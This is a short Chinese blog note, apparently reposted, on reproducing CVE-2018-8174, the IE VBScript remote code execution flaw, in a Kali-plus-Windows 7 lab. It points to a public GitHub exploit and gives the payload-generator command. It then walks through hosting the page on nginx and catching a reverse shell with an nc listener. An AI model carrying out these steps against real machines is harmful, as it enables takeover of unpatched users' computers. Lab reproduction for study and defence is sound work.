• CVE-2018-8174漏洞复现(IE浏览器远程代码执行漏洞)


    漏洞介绍:CVE-2018-8174这个漏洞是针对IE浏览器的一个远程代码执行漏洞,是Windows VBScript Engine 代码执行漏洞,由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

    受影响产品:Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

    复现过程

    环境:kali[192.168.86.132]  + (win7+IE)[192.168.86.130]

    step1、去Github下载exp到kali上

    (下载地址:https://github.com/Sch01ar/CVE-2018-8174_EXP

     进入文件目录

     然后生成payload

    python CVE-2018-8174.py -u payload的url -o rtf文件的名字 -i ip地址 -p 端口

    然后就能看到生成了两个文件:一个HTML、一个rtf文件

    将HTML文件复制到nginx的网站

     step2、关闭apache服务、重启Nginx(现在的kali是自带安装好了apache和nginx了)

    step3、启动nc监听刚刚设置好的端口,等待对方打开网站

     step4、用win7的IE浏览器打开url地址

    IE浏览器打开网页,虽然没有正常显示这个页面,但是已经攻击成功了,攻击机上没有发觉什么异样情况

     step5、返回kali看看,已经反弹一个shell了

    over!!!(今天复现了一个漏洞,写了个笔记发在这里啦!)

  • 相关阅读:
    UVa 11440 Help Tomisu (欧拉函数)
    理解最小路径覆盖(转)
    bzoj 3196: Tyvj 1730 二逼平衡树
    splay
    bzoj 3223: Tyvj 1729 文艺平衡树
    小奇的糖果(candy)
    线性函数
    bzoj 4408: [Fjoi 2016]神秘数
    bzoj 4446: [Scoi2015]小凸玩密室
    bzoj 4443: [Scoi2015]小凸玩矩阵
  • 原文地址:https://www.cnblogs.com/tsimfeiwan/p/11990565.html
Copyright © 2020-2023  润新知